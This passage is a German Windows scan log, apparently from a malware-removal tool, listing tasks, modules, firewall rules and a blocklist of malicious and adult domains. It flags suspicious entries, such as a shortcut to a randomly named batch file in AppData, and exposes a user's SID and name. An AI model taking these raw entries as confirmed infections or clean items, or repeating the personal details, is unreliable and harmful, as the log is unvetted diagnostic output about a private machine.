Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG Task: {A803118B-8018-4040-B0AB-DEBB70589A5F} - System32\Tasks\Driver Booster SkipUAC (*****) => C:\Program Files (x86)\IObit\Driver Booster\4.5.0\DriverBooster.exe Task: {AAFBDA33-C21C-4668-9CAF-14B06F45FC3D} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-07-26] (NVIDIA Corporation) Task: {B5B3C199-8D05-4D87-98CE-C413AAFB8290} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-07-26] (NVIDIA Corporation) Task: {B75DE4BB-2CA4-4515-85EA-0B346AAB0160} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.) Task: {B8F24EEC-1F14-4791-AFC9-1BB058D7BAA4} - System32\Tasks\Uninstaller_SkipUac_Martin_Walser => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe Task: {B918F1B1-79A9-45D6-8195-051607EF371D} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10 => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2016-11-05] (Dropbox, Inc.) Task: {C1A8AE88-41C5-4E46-BD3E-B0C94C9179A9} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d25a61a78c34b7 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.) Task: {D2EEA344-C1E2-4667-98B9-3F9655F456C6} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d25a61a7879fb6 => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe [2016-05-08] (Google Inc.) 
Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.) Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core1d23700db7c7e10.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA1d23700db892b60.job => C:\Users\*****\AppData\Local\Dropbox\Update\DropboxUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001Core.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1566530412-1856523912-1524002813-1001UA.job => C:\Users\*****\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\WINDOWS\Tasks\StartMenu8_Start.job => C:\Program Files (x86)\IObit\Classic Start\Start_Active.exe Task: C:\WINDOWS\Tasks\Uninstaller_Install_Martin_Walser.job => C:\Program Files (x86)\IObit\Advanced SystemCare\ActionCenterDownloader.exe Task: C:\WINDOWS\Tasks\Uninstaller_SkipUac_Martin_Walser.job => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe ==================== Verknüpfungen & WMI ======================== (Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.) 
Shortcut: C:\Users\*****\AppData\Local\Rvurcez\bdobyjg.lnk -> C:\Users\*****\AppData\Local\Bizpiwcinu\arvikxihn.bat ()

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2017-03-18 22:58 - 2017-03-18 22:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 22:59 - 2017-03-20 06:36 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 000074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-07-18 00:26 - 2017-07-18 00:26 - 000203264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 043573248 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-07-18 00:26 - 2017-07-18 00:26 - 002435584 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.19.820.0_x64__kzf8qxf38zg5c\skypert.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2017-01-24 00:19 - 2017-01-24 00:19 - 001096824 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2017-01-24 00:19 - 2017-01-24 00:19 - 000241784 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2017-06-30 13:22 - 2017-06-30 13:22 - 000069632 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll
2014-09-19 17:15 - 2014-09-19 17:15 - 000330240 _____ () C:\Program Files\Qualcomm Atheros\Network Manager\NetworkManager.exe
2012-09-13 00:38 - 2012-09-13 00:38 - 000264040 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\CameraHelperShell.exe
2016-09-29 12:59 - 2017-07-26 19:09 - 001267136 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-07-28 18:14 - 2017-07-26 19:08 - 000034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2017-07-28 18:14 - 2017-07-26 19:08 - 000920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2017-07-31 20:55 - 2017-04-18 19:01 - 002493440 _____ () G:\Program Files (x86)\Origin\libGLESv2.dll
2014-09-11 17:06 - 2014-09-11 17:06 - 000878592 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\platforms\qwindows.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000036352 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\bearer\qgenericbearer.dll
2014-09-11 17:06 - 2014-09-11 17:06 - 000038912 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\bearer\qnativerwifibearer.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000032256 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qdds.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000021504 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qgif.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000027648 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qicns.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000021504 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qico.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000381952 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qjp2.dll
2014-09-11 17:05 - 2014-09-11 17:05 - 000204800 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qjpeg.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000218112 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qmng.dll
2014-09-11 17:08 - 2014-09-11 17:08 - 000015872 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qsvg.dll
2014-09-11 17:14 - 2014-09-11 17:14 - 000015360 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qtga.dll
2014-09-11 17:15 - 2014-09-11 17:15 - 000307712 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qtiff.dll
2014-09-11 17:15 - 2014-09-11 17:15 - 000014848 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qwbmp.dll
2014-09-11 17:15 - 2014-09-11 17:15 - 000252928 _____ () C:\Program Files (x86)\MyDrive Connect\Plugins\imageformats\qwebp.dll
2017-06-01 23:04 - 2017-05-17 03:54 - 000678176 _____ () G:\Program Files (x86)\Steam\SDL2.dll
2017-07-24 18:15 - 2017-07-18 02:33 - 002497824 _____ () G:\Program Files (x86)\Steam\video.dll
2017-03-18 00:47 - 2016-09-01 03:02 - 004969248 _____ () G:\Program Files (x86)\Steam\v8.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000491008 _____ () G:\Program Files (x86)\Steam\libavformat-56.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000332800 _____ () G:\Program Files (x86)\Steam\libavresample-2.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000442880 _____ () G:\Program Files (x86)\Steam\libavutil-54.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 002549760 _____ () G:\Program Files (x86)\Steam\libavcodec-56.dll
2017-03-18 00:47 - 2016-01-27 09:49 - 000485888 _____ () G:\Program Files (x86)\Steam\libswscale-3.dll
2017-03-18 00:47 - 2016-09-01 03:02 - 001195296 _____ () G:\Program Files (x86)\Steam\icuuc.dll
2017-03-18 00:47 - 2016-09-01 03:02 - 001563936 _____ () G:\Program Files (x86)\Steam\icui18n.dll
2017-07-24 18:15 - 2017-07-18 02:33 - 000884512 _____ () G:\Program Files (x86)\Steam\bin\chromehtml.DLL
2017-03-18 00:47 - 2016-07-05 00:17 - 000266560 _____ () G:\Program Files (x86)\Steam\openvr_api.dll
2016-04-09 00:35 - 2016-04-09 00:35 - 003481600 _____ () C:\Users\*****\AppData\Local\Programs\Google\Google Photos Backup\gpuploader_i18n.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 002144104 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtCore4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000341352 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtXml4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 007955304 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\QtGui4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000028008 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QGif4.dll
2012-09-13 00:38 - 2012-09-13 00:38 - 000127336 _____ () C:\Program Files (x86)\Logitech\LWS\Webcam Software\imageformats\QJpeg4.dll
2012-09-13 00:39 - 2012-09-13 00:39 - 000336232 _____ () C:\Program Files (x86)\Common Files\logishrd\LWSPlugins\LWS\Applets\CameraHelper\DevManagerCore.dll
2017-06-08 20:06 - 2017-05-17 03:54 - 000678176 _____ () G:\Program Files (x86)\Steam\bin\cef\cef.win7\SDL2.dll
2017-07-12 19:34 - 2017-07-06 19:58 - 073088800 _____ () G:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2017-07-24 18:15 - 2017-07-18 02:33 - 000384288 _____ () G:\Program Files (x86)\Steam\steam.dll
2017-01-29 16:41 - 2017-07-26 19:09 - 001040320 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-03-11 14:34 - 2015-12-29 12:30 - 000355616 _____ () C:\Program Files (x86)\IObit\Classic Start\madExcept_.bpl
2017-03-11 14:34 - 2015-12-29 12:29 - 000190240 _____ () C:\Program Files (x86)\IObit\Classic Start\madBasic_.bpl
2017-03-11 14:34 - 2015-12-29 12:30 - 000057632 _____ () C:\Program Files (x86)\IObit\Classic Start\madDisAsm_.bpl
2017-03-11 14:34 - 2015-12-29 12:30 - 000059680 _____ () C:\Program Files (x86)\IObit\Classic Start\parseAuto.dll
2017-03-11 14:34 - 2015-12-29 12:30 - 000275576 _____ () C:\Program Files (x86)\IObit\Classic Start\sqlite3.dll
2017-03-11 14:34 - 2015-12-29 12:31 - 000047904 _____ () C:\Program Files (x86)\IObit\Classic Start\winkey.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 067725936 _____ () C:\Users\*****\AppData\Roaming\Spotify\libcef.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 000110192 _____ () C:\Users\*****\AppData\Roaming\Spotify\SpotifyWinRT.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 001929840 _____ () C:\Users\*****\AppData\Roaming\Spotify\libglesv2.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 000087152 _____ () C:\Users\*****\AppData\Roaming\Spotify\libegl.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9 [135]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)

==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\008k.com -> 008k.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\00hq.com -> 00hq.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0190-dialers.com -> 0190-dialers.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\01i.info -> 01i.info
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\05p.com -> 05p.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0calories.net -> 0calories.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0cj.net -> 0cj.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0scan.com -> 0scan.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-domains-registrations.com -> 1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-se.com -> 1-se.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1001movie.com -> 1001movie.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1001night.biz -> 1001night.biz
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\100gal.net -> 100gal.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\100sexlinks.com -> 100sexlinks.com

Da befinden sich 4789 mehr Seiten.

==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2013-08-22 15:25 - 2013-08-22 15:25 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\*****\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\fantasy.jpg
DNS Servers: 62.2.24.162 - 62.2.17.61
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

MSCONFIG\Services: PDF Architect 5 Manager => 2
HKLM\...\StartupApproved\StartupFolder: => "UE Music Library-Taskleisten-Tool.lnk"
HKLM\...\StartupApproved\StartupFolder: => "simplicheck.lnk"
HKLM\...\StartupApproved\Run32: => "UpdReg"
HKLM\...\StartupApproved\Run32: => "Raptr"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\StartupApproved\StartupFolder: => "Dropbox.lnk"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\StartupApproved\Run: => "BingSvc"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{A48CA470-A870-4179-B1B2-4E1B515CF8CC}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe
FirewallRules: [{15C73935-9422-4FF2-8044-5909C2A58895}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe
FirewallRules: [UDP Query User{9EE745C2-5DD7-43D6-AC1A-F4CB56837C77}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [TCP Query User{7CDC35E1-0481-4B34-B7A2-07A7BF9EA6B4}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{02439386-6E1B-4B1A-85CE-2BAEDC630B7D}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe
FirewallRules: [TCP Query User{21237B05-7282-4B4E-A1B9-166036A3F782}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe
FirewallRules: [UDP Query User{DF239A90-3015-4A02-9683-656B9FF43E4E}G:\program files (x86)\steam\steamapps\common\eve
online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe FirewallRules: [TCP Query User{ACCBBD61-2F9E-4EB0-85D4-5BA97DE3FBCF}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe FirewallRules: [{0D1B9AD2-C22B-49E0-A70F-ACB9065E4C01}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe FirewallRules: [{E0EEBF19-98E6-42DE-BFD5-648FE1CAC4EA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe FirewallRules: [UDP Query User{A99BD097-FB9C-4197-B13A-5C40B5146AE9}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe FirewallRules: [TCP Query User{2AAE67D8-35FC-4732-ACEC-7220F4914FE7}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe FirewallRules: [UDP Query User{E7165155-1031-43E7-9F56-B39F3081C3FC}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe FirewallRules: [TCP Query User{015D5357-1B6C-4BB6-8E04-A92E4DEE27D8}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe FirewallRules: [{9D819DCB-2F2A-4F0C-8B4E-BAF745DDCDAA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe FirewallRules: [{6AD5DAF0-AD0C-4397-80FB-784D39972676}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe FirewallRules: [{BC6EB3F3-2A98-46F0-9150-BCC21E2A56E7}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{F69BB511-8722-4AC1-826A-17EF9DF0BC0E}] => (Allow) 
G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{B4593F94-2FA0-4595-B476-E2B14AA8F5C2}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe FirewallRules: [{4C81C009-BCAE-43D4-9498-8EAE2B0A4C6A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe FirewallRules: [{310A94E6-73AC-4ED9-B2FC-0B186AB40DE6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{B32AAF55-10AB-4914-B9AE-52159DE5512C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe FirewallRules: [{B09ADEED-B680-4B72-900B-77D2C4F2650F}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe FirewallRules: [{49966F41-9BFA-48F3-A63D-8FACAF2E5036}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe FirewallRules: [{2FC5A6BD-BF05-4164-89C1-16FE7BF2BAE1}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe FirewallRules: [{C2397ABC-794C-40AF-A15E-DA816A4EC318}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe FirewallRules: [{B1052126-2905-42E2-956D-850CCD9C1014}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe FirewallRules: [UDP Query User{0FF06ECA-E1F0-41B0-8FCD-126D174715D0}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe FirewallRules: [TCP Query User{6928C914-94B4-4F89-99D1-4AA5BBD06AFC}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite 
dangerous\products\elite-dangerous-64\elitedangerous64.exe FirewallRules: [UDP Query User{98FBAFC3-976A-4164-813B-40F32032BBDF}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe FirewallRules: [TCP Query User{8030943B-531A-4F01-9F2A-FF946F4B1285}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe FirewallRules: [UDP Query User{54BD8357-54B2-4494-9854-D8EDB5EC5113}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe FirewallRules: [TCP Query User{BA245DA0-2241-46ED-8F5B-6B4A4A9FF1F7}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{2B51C0D6-D4E8-4CC0-8271-F4A911C2F406}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe FirewallRules: [TCP Query User{437D4E9B-EC49-4CF6-8CD2-921830F6564C}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe FirewallRules: [{39430812-9852-49ED-9F86-904CB000274A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe FirewallRules: [{7376B877-0383-44F7-909E-07F9D738AFA7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe FirewallRules: [{22067E9A-32F2-40FF-AC7A-01F94C55642C}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe FirewallRules: [{8D47AC7F-25CB-4C41-A7BA-EF713FCE93CF}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe FirewallRules: [{A7EEE726-FE30-4C66-8AD5-93D5C3C96B07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite 
Dangerous\EDLaunch.exe FirewallRules: [{87C53834-94A0-4EEA-B4F5-6311177D9A07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe FirewallRules: [{EA9F2049-950D-439D-85B9-02D649D73245}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe FirewallRules: [{247328BE-4699-4A3F-A6CA-661592F926AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe FirewallRules: [{DD07B558-9E11-4AAD-9B6D-7B75E3B4B53B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe FirewallRules: [{F4996C83-AA13-4703-B61B-4A89884F8B90}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe FirewallRules: [{679B2599-B113-4728-B3FA-84E705F0BBDD}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe FirewallRules: [{96341DDC-B74C-4FDE-A455-66A4B4835DF6}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe FirewallRules: [{6818289E-239B-49EE-B001-FB69A2E6A8C0}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe FirewallRules: [{F0859AC3-60E3-4D00-B630-170BF1C441E5}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe FirewallRules: [{B515A77B-C22A-4D35-957F-4BC619063FF5}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe FirewallRules: [{42C09225-0BCA-4B7A-A912-874BA402CA17}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe FirewallRules: [{4F1029AB-0FBD-45F8-9898-689A2D6F9BAC}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{679F21A3-8A59-45B3-8C1E-EFE5E0710C63}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe FirewallRules: [TCP Query 
User{FB088684-BBC4-4D8B-BBAF-5842DA9EE196}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{2A8CE33E-EC98-4518-B46D-42E1DEA51F46}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe FirewallRules: [{4D766A26-785C-455E-B90F-F910A14E7B7F}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe FirewallRules: [{451F15F9-2D6B-46B6-ACB5-710CD2226BDD}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe FirewallRules: [TCP Query User{37632275-71A2-49D8-A0FA-70CCB7875F1E}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe FirewallRules: [UDP Query User{2314FC4F-415A-4DF3-AA49-81CFB9ACE68A}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe FirewallRules: [TCP Query User{DA695000-4AF9-41AF-9754-C8FA4C6954C1}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [UDP Query 